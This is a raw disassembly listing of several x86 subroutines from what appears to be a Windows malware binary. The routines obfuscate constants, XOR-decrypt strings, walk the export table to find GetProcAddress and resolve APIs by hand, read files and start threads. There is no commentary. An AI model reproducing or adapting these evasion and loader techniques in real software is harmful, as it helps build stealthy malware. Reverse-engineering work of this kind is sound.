xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, dword_44B0B0
add edx, 1FBh
add edx, dword_44B094
mov ebx, eax
imul ebx, edx
mov eax, dword_44B124
mov ecx, eax
add ecx, dword_44B0BC
dec ecx
jmp short loc_43D2E8
; ---------------------------------------------------------------------------
loc_43D2DA: ; CODE XREF: sub_43D28C+5E�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_43D2E8: ; CODE XREF: sub_43D28C+4C�j
cmp ecx, ebx
jb short loc_43D2DA
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_43D28C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D2F7 proc near ; CODE XREF: sub_443EA2+1A4�p
; sub_443EA2+1C5�p
var_4F = byte ptr -4Fh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call ds:dword_44A770 ; GetTickCount
mov [ebp+var_8], eax
mov esi, dword_44B0E8
sub esi, 6
jmp short loc_43D357
; ---------------------------------------------------------------------------
loc_43D317: ; CODE XREF: sub_43D2F7+6C�j
cmp ds:dword_446130[esi*4], 0
jz short loc_43D356
mov edx, ds:dword_449660[esi*4]
movsx ecx, word_44B0A4
movsx eax, word_44B11C
lea ecx, [ecx+eax+0EA59h]
movsx eax, word_44B0B4
imul ecx, eax
add edx, ecx
cmp edx, [ebp+var_8]
jnb short loc_43D356
and ds:dword_446130[esi*4], 0
loc_43D356: ; CODE XREF: sub_43D2F7+28�j
; sub_43D2F7+55�j
inc esi
loc_43D357: ; CODE XREF: sub_43D2F7+1E�j
mov eax, dword_44B094
add eax, 3E8h
cmp esi, eax
jb short loc_43D317
loc_43D365: ; CODE XREF: sub_43D2F7+9A�j
; sub_43D2F7+25B�j
mov eax, [ebx]
mov [ebp+var_14], eax
lea ebx, [ebx+eax]
mov eax, ebx
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb loc_43D558
movsx eax, word_44B130
movsx edx, word_44B120
add eax, edx
sub eax, 8
cmp [ebp+var_14], eax
ja short loc_43D365
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_43D398: ; CODE XREF: sub_43D2F7+A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D398
mov [ebp+var_10], eax
mov eax, ebx
sub eax, [ebp+arg_0]
mov edx, dword_44B110
sub edx, 4
sub eax, edx
mov [ebp+var_C], eax
mov [ebp+var_1], 44h
mov eax, dword_44B0C4
add eax, dword_44B09C
sub eax, 7
cmp byte ptr [ebx+eax], 2Ah
jnz short loc_43D3D1
mov [ebp+var_1], 43h
loc_43D3D1: ; CODE XREF: sub_43D2F7+D4�j
mov edi, dword_44B0AC
sub edi, 2
jmp short loc_43D403
; ---------------------------------------------------------------------------
loc_43D3DC: ; CODE XREF: sub_43D2F7+118�j
cmp ds:dword_446130[edi*4], 0
jz short loc_43D402
mov edx, [ebp+var_C]
cmp ds:dword_445060[edi*4], edx
jnz short loc_43D402
mov dl, ds:byte_447200[edi]
cmp dl, [ebp+var_1]
jz loc_43D535
loc_43D402: ; CODE XREF: sub_43D2F7+ED�j
; sub_43D2F7+F9�j
inc edi
loc_43D403: ; CODE XREF: sub_43D2F7+E3�j
mov eax, dword_44B0E8
add eax, 3E2h
cmp edi, eax
jb short loc_43D3DC
mov eax, dword_44B110
add eax, 3B6h
add eax, dword_44B148
cmp [ebp+var_10], eax
jbe loc_43D4E3
mov eax, dword_44B0D4
add eax, 0Fh
push eax
lea eax, [ebp+var_4F]
push eax
call sub_443D65
add esp, 8
mov eax, dword_44B0D8
add eax, 3BDh
mov [ebp+var_18], eax
mov eax, dword_44B124
sub eax, 2
mov [ebp+var_1C], eax
loc_43D457: ; CODE XREF: sub_43D2F7+1E7�j
mov eax, [ebp+var_18]
mov al, [ebx+eax]
mov [ebp+var_1D], al
mov eax, [ebp+var_18]
movsx edx, word_44B11C
movsx ecx, word_44B0E4
add edx, ecx
sub edx, 8
mov [ebx+eax], dl
push offset dword_446020
push [ebp+var_10]
push [ebp+var_1C]
lea eax, [ebp+var_4F]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
movsx eax, word_44B14C
add eax, dword_44B094
sub eax, 4
and eax, 0FFh
push eax
call sub_4402F1
add esp, 24h
mov eax, [ebp+var_18]
mov dl, [ebp+var_1D]
mov [ebx+eax], dl
mov [ebp+var_1C], eax
mov eax, dword_44B0E8
add eax, 3BAh
add [ebp+var_18], eax
mov eax, [ebp+var_10]
cmp [ebp+var_18], eax
jbe short loc_43D4D6
mov [ebp+var_18], eax
loc_43D4D6: ; CODE XREF: sub_43D2F7+1DA�j
mov eax, [ebp+var_10]
cmp [ebp+var_1C], eax
jnb short loc_43D530
jmp loc_43D457
; ---------------------------------------------------------------------------
loc_43D4E3: ; CODE XREF: sub_43D2F7+12D�j
push offset byte_44C611
call sub_43DF30
push offset dword_446020
push [ebp+var_10]
mov edx, dword_44B148
add edx, dword_44B0D0
sub edx, 2
push edx
push eax
mov edx, [ebp+arg_C]
push dword ptr [edx]
push [ebp+arg_0]
push ebx
push [ebp+arg_8]
mov edx, dword_44B104
mov ecx, edx
add ecx, edx
mov edx, ecx
sub edx, 4
and edx, 0FFh
push edx
call sub_4402F1
add esp, 28h
loc_43D530: ; CODE XREF: sub_43D2F7+1E5�j
mov eax, [ebp+arg_C]
inc dword ptr [eax]
loc_43D535: ; CODE XREF: sub_43D2F7+105�j
mov eax, [ebp+var_10]
lea ebx, [ebx+eax]
inc ebx
mov eax, [ebp+arg_C]
movsx edx, word_44B090
mov ecx, dword_44B0BC
lea edx, [edx+ecx+11h]
cmp [eax], edx
jbe loc_43D365
loc_43D558: ; CODE XREF: sub_43D2F7+7E�j
push offset byte_44C60D
call sub_43DF30
push offset dword_446020
movsx edx, word_44B0CC
sub edx, 7
push edx
push dword_44B128
push eax
movsx edx, word_44B120
mov ecx, edx
add ecx, edx
mov edx, ecx
sub edx, 10h
push edx
push 0
push 0
push [ebp+arg_8]
movsx edx, word_44B11C
add edx, dword_44B0BC
sub edx, 2
and edx, 0FFh
push edx
call sub_4402F1
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_43D2F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D5B5 proc near ; CODE XREF: sub_43FC77+22B�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21F = byte ptr -21Fh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
movsx esi, word_44B12C
mov ecx, esi
add ecx, 0Ch
shr edi, cl
mov esi, dword_44B0D0
add esi, 0Ch
add esi, dword_44B0A8
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_43D5E7: ; CODE XREF: sub_43D5B5+4D�j
; sub_43D5B5+86�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_43D604
mov eax, dword_44B124
add eax, 0FFFEh
sub ebx, eax
jmp short loc_43D5E7
; ---------------------------------------------------------------------------
loc_43D604: ; CODE XREF: sub_43D5B5+3F�j
mov eax, dword_44B094
add eax, 3Ch
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_43D63D
mov eax, dword_44B134
add eax, 0FFF8h
add eax, dword_44B0A8
sub ebx, eax
jmp short loc_43D5E7
; ---------------------------------------------------------------------------
loc_43D63D: ; CODE XREF: sub_43D5B5+72�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_43D663
mov eax, dword_44B144
lea eax, [eax+eax+10000h]
sub ebx, eax
jmp short loc_43D5E7
; ---------------------------------------------------------------------------
loc_43D663: ; CODE XREF: sub_43D5B5+9C�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_444C90
mov eax, dword_44B0FC
add eax, dword_44B0C4
sub eax, 7
mov [ebp+var_4], eax
jmp short loc_43D6C5
; ---------------------------------------------------------------------------
loc_43D6A3: ; CODE XREF: sub_43D5B5+126�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_43D6C2
cmp al, 7Ah
jge short loc_43D6C2
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_43D6C2: ; CODE XREF: sub_43D5B5+FA�j
; sub_43D5B5+FE�j
inc [ebp+var_4]
loc_43D6C5: ; CODE XREF: sub_43D5B5+EC�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, dword_44B0B0
sub edx, 5
cmp eax, edx
jnz short loc_43D6A3
cmp [ebp+var_103], 4Bh
jnz short loc_43D713
cmp [ebp+var_102], 45h
jnz short loc_43D713
cmp [ebp+var_101], 52h
jnz short loc_43D713
cmp [ebp+var_FE], 4Ch
jnz short loc_43D713
cmp [ebp+var_FD], 33h
jnz short loc_43D713
cmp [ebp+var_FC], 32h
jz short loc_43D718
loc_43D713: ; CODE XREF: sub_43D5B5+12F�j
; sub_43D5B5+138�j ...
jmp loc_43D961
; ---------------------------------------------------------------------------
loc_43D718: ; CODE XREF: sub_43D5B5+15C�j
mov eax, dword_44B0AC
add eax, dword_44B0A8
sub eax, 6
mov [ebp+var_108], eax
jmp loc_43D94C
; ---------------------------------------------------------------------------
loc_43D731: ; CODE XREF: sub_43D5B5+3A6�j
mov eax, [ebp+var_108]
movsx ecx, word_44B0E4
movsx esi, word_44B0B4
add ecx, esi
sub ecx, 7
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_444C90
movsx eax, word_44B114
cmp byte ptr [ebp+eax+var_224+2], 47h
jnz loc_43D946
mov eax, dword_44B128
add eax, dword_44B0FC
cmp [ebp+eax+var_220], 74h
jnz loc_43D946
movsx eax, word_44B140
movsx edx, word_44B090
add eax, edx
cmp byte ptr [ebp+eax+var_228+3], 50h
jnz loc_43D946
mov eax, dword_44B094
add eax, 2
movsx edx, word_44B14C
add eax, edx
cmp [ebp+eax+var_21F], 63h
jnz loc_43D946
movsx eax, word_44B13C
cmp [ebp+eax+var_21F], 41h
jnz loc_43D946
mov eax, dword_44B104
add eax, 2
movsx edx, word_44B0E4
add eax, edx
cmp [ebp+eax+var_21F], 72h
jnz loc_43D946
mov eax, [ebp+var_108]
movsx ecx, word_44B108
add ecx, dword_44B0AC
sub ecx, 5
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
mov ecx, dword_44B100
add ecx, dword_44B138
dec ecx
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov dword_44B154, ebx
mov ds:dword_4471F8, edx
lea edi, [ebp+var_23D]
lea esi, aCreatethread ; "CreateThread"
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, aEntercriticals ; "EnterCriticalSection"
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, aInitializecrit ; "InitializeCriticalSection"
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, aLeavecriticals ; "LeaveCriticalSection"
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44AB90, eax
lea eax, [ebp+var_252]
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44A65C, eax
lea eax, [ebp+var_26C]
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446008, eax
lea eax, [ebp+var_281]
push eax
push dword_44B154
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44964C, eax
jmp short loc_43D961
; ---------------------------------------------------------------------------
loc_43D946: ; CODE XREF: sub_43D5B5+1D8�j
; sub_43D5B5+1F1�j ...
inc [ebp+var_108]
loc_43D94C: ; CODE XREF: sub_43D5B5+177�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_43D731
loc_43D961: ; CODE XREF: sub_43D5B5:loc_43D713�j
; sub_43D5B5+38F�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D5B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D966 proc near ; CODE XREF: sub_43F328+246�p
var_209 = byte ptr -209h
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_1FE = byte ptr -1FEh
var_107 = byte ptr -107h
var_102 = byte ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_F8 = byte ptr -0F8h
push ebp
mov ebp, esp
sub esp, 20Ch
push esi
push edi
push 0FFh
lea eax, [ebp+var_1FE]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
push offset word_44C5FA
call sub_43DF30
movsx edi, word_44B108
movsx esi, word_44B0F4
add edi, esi
sub edi, 4
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push offset dword_4470F0
call ds:dword_44A634
push offset byte_44C5E7
call sub_43DF30
movsx edi, word_44B14C
sub edi, 3
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push offset dword_448260
call ds:dword_44A634
lea eax, sub_440C54
mov ds:dword_44A62C, eax
lea eax, sub_440C54
mov ds:dword_44504C, eax
lea eax, sub_43B8FD
mov ds:dword_44A774, eax
push offset dword_446020
call sub_440A86
movsx eax, word_44B0B8
movsx edx, word_44B0A4
lea eax, [eax+edx+3]
push eax
push offset dword_448230
call sub_443D65
lea eax, sub_43B609
mov ds:dword_448228, eax
lea eax, sub_43E013
mov ds:dword_447A30, eax
lea eax, dword_4470F0
mov ds:dword_44963C, eax
lea eax, dword_448260
mov ds:dword_445018, eax
lea eax, dword_44A670
mov dword_44B230, eax
lea eax, [ebp+var_204]
push eax
movsx eax, word_44B11C
sub eax, 2
push eax
push 0
push offset sub_43F211
mov eax, dword_44B10C
sub eax, 3
push eax
push 0
call ds:dword_44AB90 ; CreateThread
push eax
call ds:dword_449650 ; CloseHandle
lea eax, [ebp+var_208]
push eax
mov eax, dword_44B0F8
sub eax, 7
push eax
push 0
push offset sub_43C2AC
movsx eax, word_44B114
sub eax, 3
push eax
push 0
call ds:dword_44AB90 ; CreateThread
push eax
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B09C
add eax, 7
mov ds:dword_44761C, eax
mov eax, dword_44B0D8
sub eax, 2
push eax
lea eax, [ebp+var_FF]
push eax
call sub_43B4DD
add esp, 3Ch
mov eax, dword_44B0FC
add eax, dword_44B128
cmp [ebp+eax+var_102], 64h
jnz short loc_43DB40
movsx eax, [ebp+var_FE]
movsx edx, word_44B0B8
movsx ecx, word_44B11C
lea edx, [edx+ecx+1Ch]
sub eax, edx
mov [ebp+var_209], al
movzx eax, [ebp+var_209]
push eax
push 0
call sub_441E11
add esp, 8
mov eax, dword_44B138
movsx edx, word_44B13C
add eax, edx
sub eax, 9
mov ds:dword_44761C, eax
loc_43DB40: ; CODE XREF: sub_43D966+18F�j
mov eax, dword_44B0DC
cmp [ebp+eax+var_107], 67h
jnz short loc_43DB9B
mov eax, dword_44B100
mov edx, dword_44B148
sub edx, 2
mov [ebp+eax+var_F8], dl
lea eax, [ebp+var_FE]
push eax
call ds:dword_445054
mov [ebp-20Ch], eax
push eax
push offset dword_44A670
call sub_442143
add esp, 0Ch
mov eax, dword_44B104
movsx edx, word_44B130
add eax, edx
sub eax, 6
mov ds:dword_44761C, eax
loc_43DB9B: ; CODE XREF: sub_43D966+1E7�j
pop edi
pop esi
leave
retn
sub_43D966 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DB9F proc near ; DATA XREF: .data:off_44B214�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44C8F0
push esi
call ds:dword_44A644
or eax, eax
jz short loc_43DBCB
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43DC13
; ---------------------------------------------------------------------------
loc_43DBCB: ; CODE XREF: sub_43DB9F+1A�j
push offset dword_44C870
push esi
call ds:dword_44A644
or eax, eax
jz short loc_43DBEB
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43DC13
; ---------------------------------------------------------------------------
loc_43DBEB: ; CODE XREF: sub_43DB9F+3A�j
push offset dword_44C850
push esi
call ds:dword_44A644
or eax, eax
jz short loc_43DC0B
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43DC13
; ---------------------------------------------------------------------------
loc_43DC0B: ; CODE XREF: sub_43DB9F+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43DC13: ; CODE XREF: sub_43DB9F+2A�j
; sub_43DB9F+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43DB9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DC1A proc near ; CODE XREF: sub_43B8FD+18�p
; sub_443EA2+16E�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_43DC63
cmp [ebp+arg_4], 0
jz short loc_43DC5F
mov eax, [ebp+arg_4]
movsx edx, word_44B12C
add edx, dword_44B124
sub edx, 6
mov [eax], edx
loc_43DC5F: ; CODE XREF: sub_43DC1A+2E�j
xor eax, eax
jmp short loc_43DCA7
; ---------------------------------------------------------------------------
loc_43DC63: ; CODE XREF: sub_43DC1A+28�j
push 0
push edi
call ds:dword_44A624 ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call ds:dword_447A34 ; LocalAlloc
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_43DC8C
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_43DC92
; ---------------------------------------------------------------------------
loc_43DC8C: ; CODE XREF: sub_43DC1A+68�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_43DC92: ; CODE XREF: sub_43DC1A+70�j
push [ebp+var_8]
push esi
push ebx
push edi
call ds:dword_445028 ; ReadFile
push edi
call ds:dword_449650 ; CloseHandle
mov eax, ebx
loc_43DCA7: ; CODE XREF: sub_43DC1A+47�j
pop edi
pop esi
pop ebx
leave
retn
sub_43DC1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DCAC proc near ; DATA XREF: .data:0044B22C�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
mov eax, dword_44B09C
add eax, 7
add eax, dword_44B144
cmp ds:dword_44761C, eax
jnb short loc_43DCE6
mov eax, dword_44B0A8
add eax, dword_44B0C0
sub eax, 7
mov ds:dword_44761C, eax
loc_43DCE6: ; CODE XREF: sub_43DCAC+25�j
mov eax, dword_44B0D0
mov edi, eax
add edi, dword_44B0BC
dec edi
jmp short loc_43DD02
; ---------------------------------------------------------------------------
loc_43DCF6: ; CODE XREF: sub_43DCAC+6C�j
lea ebx, ds:446130h[edi*4]
cmp esi, ebx
jz short loc_43DD1A
inc edi
loc_43DD02: ; CODE XREF: sub_43DCAC+48�j
movsx eax, word_44B130
mov edx, dword_44B0C4
lea eax, [eax+edx+3E0h]
cmp edi, eax
jb short loc_43DCF6
loc_43DD1A: ; CODE XREF: sub_43DCAC+53�j
movsx eax, word_44B0B8
add eax, 3E6h
cmp edi, eax
jnz short loc_43DD31
xor eax, eax
jmp loc_43DE7C
; ---------------------------------------------------------------------------
loc_43DD31: ; CODE XREF: sub_43DCAC+7C�j
movzx esi, ds:word_447A50[edi*2]
mov ebx, dword_44B100
sub ebx, 2
cmp esi, ebx
jnz short loc_43DD6D
movzx eax, ds:byte_447200[edi]
push eax
push ds:dword_445060[edi*4]
call sub_43F242
add esp, 8
and ds:dword_446130[edi*4], 0
xor eax, eax
jmp loc_43DE7C
; ---------------------------------------------------------------------------
loc_43DD6D: ; CODE XREF: sub_43DCAC+98�j
movzx esi, ds:word_447A50[edi*2]
movsx ebx, word_44B0E4
add ebx, 0FFF9h
cmp esi, ebx
jnz loc_43DE57
mov eax, dword_44B138
sub eax, 2
mov [ebp+var_4], eax
jmp loc_43DE3E
; ---------------------------------------------------------------------------
loc_43DD9A: ; CODE XREF: sub_43DCAC+1A1�j
mov esi, [ebp+var_4]
mov ebx, esi
shl ebx, 2
cmp ds:dword_446130[ebx], 0
jz loc_43DE3B
movzx edx, ds:word_447A50[esi*2]
mov ecx, dword_44B0BC
add ecx, 0FFFEh
cmp edx, ecx
jz short loc_43DE3B
mov edx, ds:dword_445060[edi*4]
cmp ds:dword_445060[ebx], edx
jnz short loc_43DE3B
mov bl, ds:byte_447200[esi]
cmp bl, ds:byte_447200[edi]
jnz short loc_43DE3B
movsx esi, word_44B11C
mov ebx, [ebp+var_4]
movzx ebx, ds:word_447A50[ebx*2]
mov edx, esi
add edx, esi
mov esi, edx
sub esi, 3
cmp ebx, esi
jnz short loc_43DE2C
mov esi, [ebp+var_4]
movzx ebx, ds:byte_447200[esi]
push ebx
push ds:dword_445060[esi*4]
call sub_43F242
add esp, 8
and ds:dword_446130[edi*4], 0
jmp short loc_43DE53
; ---------------------------------------------------------------------------
loc_43DE2C: ; CODE XREF: sub_43DCAC+159�j
mov esi, [ebp+var_4]
lea esi, ds:447A50h[esi*2]
dec word ptr [esi]
jmp short loc_43DE53
; ---------------------------------------------------------------------------
loc_43DE3B: ; CODE XREF: sub_43DCAC+FE�j
; sub_43DCAC+11A�j ...
inc [ebp+var_4]
loc_43DE3E: ; CODE XREF: sub_43DCAC+E9�j
movsx eax, word_44B0F4
add eax, 3E8h
cmp [ebp+var_4], eax
jb loc_43DD9A
loc_43DE53: ; CODE XREF: sub_43DCAC+17E�j
; sub_43DCAC+18D�j
xor eax, eax
jmp short loc_43DE7C
; ---------------------------------------------------------------------------
loc_43DE57: ; CODE XREF: sub_43DCAC+D8�j
movzx esi, ds:word_447A50[edi*2]
mov ebx, dword_44B0C8
add ebx, dword_44B0C4
sub ebx, 7
cmp esi, ebx
jle short loc_43DE7A
dec ds:word_447A50[edi*2]
loc_43DE7A: ; CODE XREF: sub_43DCAC+1C4�j
xor eax, eax
loc_43DE7C: ; CODE XREF: sub_43DCAC+80�j
; sub_43DCAC+BC�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43DCAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DE83 proc near ; CODE XREF: sub_43C35B+3C�p
; sub_43C35B+B3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
mov eax, dword_44B09C
add eax, 0FDh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
mov eax, dword_44B0D8
add eax, 0F8h
add eax, dword_44B098
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
movsx esi, word_44B0CC
sub esi, 7
jmp short loc_43DF1F
; ---------------------------------------------------------------------------
loc_43DECE: ; CODE XREF: sub_43DE83+A6�j
mov edi, dword_44B110
add edi, dword_44B138
sub edi, 7
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_43DEF4
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_43DEF4: ; CODE XREF: sub_43DE83+6A�j
mov ecx, off_44B17C
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
movsx edi, word_44B14C
movsx edx, word_44B13C
lea ecx, [edi+edx+35h]
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_43DF1F: ; CODE XREF: sub_43DE83+49�j
mov eax, dword_44B144
add eax, 4
cmp esi, eax
jl short loc_43DECE
pop edi
pop esi
pop ebx
leave
retn
sub_43DE83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DF30 proc near ; CODE XREF: sub_43A324+3E�p
; sub_43A503+2A9�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44B150, 0
jnz short loc_43DF58
push offset dword_44ABC0
call ds:dword_446008 ; InitializeCriticalSection
mov dword_44B150, 1
loc_43DF58: ; CODE XREF: sub_43DF30+11�j
mov esi, dword_44B0E8
movsx ebx, word_44B0F4
add esi, ebx
sub esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
movsx edx, word_44B0E0
sub edx, 5
cmp eax, edx
jz short loc_43E00B
push offset dword_44ABC0
call ds:dword_44A65C ; RtlEnterCriticalSection
movsx eax, word_44B14C
dec eax
mov [ebp+var_2], ax
jmp short loc_43DFC2
; ---------------------------------------------------------------------------
loc_43DFAD: ; CODE XREF: sub_43DF30+9C�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_43DFC2: ; CODE XREF: sub_43DF30+7B�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_43DFAD
movsx eax, word_44B0CC
add eax, dword_44B128
sub eax, 7
movsx edx, word_44B11C
sub edx, 2
mov [edi+eax], dl
movsx eax, word_44B090
dec eax
movsx edx, word_44B13C
sub edx, 7
mov [edi+eax], dl
push offset dword_44ABC0
call ds:dword_44964C ; RtlLeaveCriticalSection
loc_43E00B: ; CODE XREF: sub_43DF30+62�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_43DF30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E013 proc near ; CODE XREF: sub_43BAE4+46C�p
; DATA XREF: sub_43D966+C9�o
var_26C = byte ptr -26Ch
var_26A = byte ptr -26Ah
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_444148
push offset word_44C5E2
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset word_44C5DA
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
mov eax, dword_44B144
add eax, dword_44B100
mov dl, [ebp+arg_0]
mov [ebp+eax+var_26A], dl
push 0
push 80h
push 4
